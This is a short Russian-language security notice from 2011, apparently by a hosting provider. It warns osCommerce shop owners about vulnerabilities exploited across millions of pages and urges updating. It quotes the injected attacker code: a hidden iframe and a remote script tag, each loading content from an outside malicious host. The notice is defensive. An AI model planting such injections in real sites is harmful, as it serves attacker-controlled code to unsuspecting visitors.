Внимание владельцам интернет-магазинов osCommerce!
05.08.2011
Обнаруженные уязвимости позволили злоумышленникам взломать более 6 миллионов страниц сайтов на osCommerce по всему миру.
Настоятельно рекомендуется проверить сайты на хостинге и выполнить обновления.
Злоумышленники, используя несколько обнаруженных уязвимостей osCommerce, получили возможность размещать на страницах интернет-магазинов свой код:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
или
<script src=http://exero.eu/catalog/jquery.js></script>
Подробные примеры и описание даны на сайте blog.armorize.com.
Для устранения уязвимостей настоятельно рекомендуется выполнить обновление своих интернет-магазинов osCommerce до последней версии, доступной на официальном сайте:
http://www.oscommerce.com/solutions/downloads
Пожалуйста, следуйте советам по обеспечению безопасности сайтов.
вопрос
специалисту